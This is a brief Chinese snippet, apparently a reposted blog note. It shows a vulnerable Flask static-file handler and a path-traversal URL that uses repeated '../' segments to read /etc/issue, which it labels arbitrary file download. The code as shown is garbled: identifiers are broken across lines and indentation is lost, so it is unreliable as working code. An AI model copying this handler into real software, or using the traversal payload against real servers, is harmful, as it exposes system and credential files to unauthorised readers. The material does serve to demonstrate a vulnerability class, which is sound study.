代码:
@main
.route
('/static/<regex(".*"):file>')
def handle_static_file(file):
if file.split
('.')[-1] in ['py','db']:
return file
if os
.path
.isdir
('static/{}'.format(file)):
return abort
(403)
try:
filename
=os
.path
.join
(app
.instance_path
,file)
with open(filename
) as f
:
data
= f
.read
()
return data
except Exception
as e
:
logging
.error
(e
)
return abort
(404)
任意文件下载:
http://127.0.0.1:8000/static/
../
../
../
../
../
../
../
../
../
../
../etc/issue
转载请注明原文地址: https://www.6miu.com/read-17162.html
